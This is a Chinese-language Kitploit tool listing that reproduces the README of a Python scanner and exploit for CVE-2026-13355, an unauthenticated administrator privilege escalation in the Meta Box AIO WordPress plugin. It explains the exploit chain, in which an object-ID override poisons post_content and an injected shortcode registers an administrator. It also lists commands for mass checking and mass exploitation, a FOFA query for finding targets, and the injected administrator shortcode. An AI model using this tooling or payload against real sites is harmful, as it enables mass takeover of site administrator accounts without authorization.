Skip to content
KitploitKITPLOIT
工具漏洞利用博客
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-13355 — Python PoC 扫描器和针对 CVE-2026-13355 的漏洞利用程序,该漏洞是 Meta Box AIO WordPress 插件中的未认证管理员权限提升漏洞,并支持 FOFA 批量扫描。 | Kitploit
工具/GitHubGitHub/murrez/cve-2026-13355
权限提升侦察漏洞扫描器漏洞利用脚本与自动化Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubmurrez/cve-2026-13355

CVE-2026-13355

Python PoC 扫描器和针对 CVE-2026-13355 的漏洞利用程序,该漏洞是 Meta Box AIO WordPress 插件中的未认证管理员权限提升漏洞,并支持 FOFA 批量扫描。

31天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2026-13355 — Meta Box AIO 未认证管理员权限提升

针对 WordPress 插件包 Meta Box AIO(以及相关的 MB Frontend Submission / MB User Profile 扩展)中 CVE-2026-13355 的 Python 3 概念验证扫描器与漏洞利用工具。

平台WordPress 插件
组件Meta Box AIO
受影响版本Meta Box AIO ≤ 3.11.0;MB Frontend Submission ≤ 4.5.6;MB User Profile ≤ 3.11.0
修复版本Meta Box AIO 3.12.0+(Form::process() 授权)
CVSS9.8 严重
认证未认证
CWECWE-269 — 权限管理不当
研究者h0xilo (Wordfence)

概述

两个捆绑扩展中的链式缺陷允许未认证创建管理员账户:

  1. MB Frontend Submission (mbfs) — rwmb_frontend_field_object_id 在未授权的情况下覆盖表单目标;Form::process() 省略了 user_can_edit(),因此攻击者可以调用 wp_update_post() 并覆盖任意文章/页面上的 post_content。
  2. MB User Profile (mbup) — 注入的 [mb_user_profile_register role="administrator" auto_login="true"] 短代码属性在未经角色验证的情况下被信任。

重要提示: 该利用链需要一个公开的 mbfs(前端提交)表单,而非仅限登录的 mbup 表单。许多 FOFA 命中仅暴露 mbup 登录/注册界面——这些被标记为 plugin_mbup_only,无法通过此链利用。

环境要求

  • Python 3.8+
  • pip install -r requirements.txt

快速开始

root@kitploit:~
pip install -r requirements.txt

# Single target — check (live terminal flow by default)
python poc.py -u https://target.example --mode check

# Mass check (one line per target unless --quiet)
python poc.py --list targets.example.txt --mode check --threads 20

# Single target — exploit (needs mbfs form URL + post ID)
python poc.py -u https://target.example --mode exploit \
  --form-url /contact/ --object-id 12 --verify

# Mass exploit from check output
python poc.py --list candidates.jsonl --mode exploit --threads 5 --verify

FOFA → 目标列表

示例查询:

root@kitploit:~
body="/wp-content/plugins/meta-box-aio/"

规范化 FOFA CSV 导出:

root@kitploit:~
python fofa_to_list.py -i fofa_export.csv
# writes list.txt + normalized CSV (local only, gitignored)
python poc.py --list list.txt --mode check --threads 20

CLI 选项

输出文件

在利用运行时使用 --vuln-list exploited.txt,以免 hits.txt 中的检查命中被覆盖。

检查 status 值

利用说明

  • 投毒步骤通过带有 ?rwmb_frontend_field_object_id=<id> 的 mbfs 表单 POST post_content。
  • 成功需要注入的短代码在被投毒页面上渲染(无 strip/KSES、插件已修补、表单类型错误)。
  • 联系/新闻通讯 mbfs 表单通常缺少真实的 post_content 字段;实际中覆盖可能仍然失败。
  • POST 时出现 HTTP 403 通常表示 WAF/主机拦截。

仓库结构

root@kitploit:~
.
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

本地扫描列表和运行产物(list.txt、fofa*.csv、*.jsonl、hits*.txt 等)位于 .gitignore 中,不应提交。

参考资料

  • NVD — CVE-2026-13355
  • Wordfence 公告
  • Meta Box AIO 更新日志

法律声明

仅供授权安全测试与教育使用。您有责任遵守适用法律和项目规则。

下载工具
选项描述
-u, --url单个基础 URL
--listURL 列表、FOFA 规范化 CSV(url 列)或 candidates.jsonl
--modecheck 或 exploit
--form-url包含 [mb_frontend_form ...] / mbfs-form 的页面
--object-id用于 rwmb_frontend_field_object_id 的文章/页面 ID
--paths额外爬取以查找前端表单的路径
--username, --email, --password注册凭据(利用)
--shortcode注入的 post_content 载荷(默认管理员注册短代码)
--verify注册后通过 /wp-admin/ 或 wp-login.php 确认
--flow批量运行时每个目标流式输出一行(使用 --list 时默认)
--no-flow仅显示进度摘要
--quiet, -q最小化控制台输出
--threads, -j批量并发数(默认 15)
--outputJSONL 日志(默认 cve_2026_13355_results.jsonl)
--vuln-list文本命中/已利用行(默认 hits.txt / 利用时使用 exploited.txt)
--candidates-list检查元数据 JSONL(默认 candidates.jsonl)
文件模式内容
cve_2026_13355_results.jsonl两者每个目标的完整 JSON
hits.txtcheck包含 candidate_mbfs 的 URL
candidates.jsonlcheckform_url、object_id、版本提示
exploited.txtexploiturl|user|email|pass|oid=…
状态含义
candidate_mbfs插件存在 + 发现 MB Frontend Submission 表单(可能可利用)
plugin_mbup_only仅有 User Profile 登录/注册表单 — 不是此 CVE 链
plugin_no_frontend_forms插件指纹存在,未发现 rwmb 前端表单
patched版本高于受影响范围(当可读取时)
no_plugin未检测到 Meta Box AIO / 扩展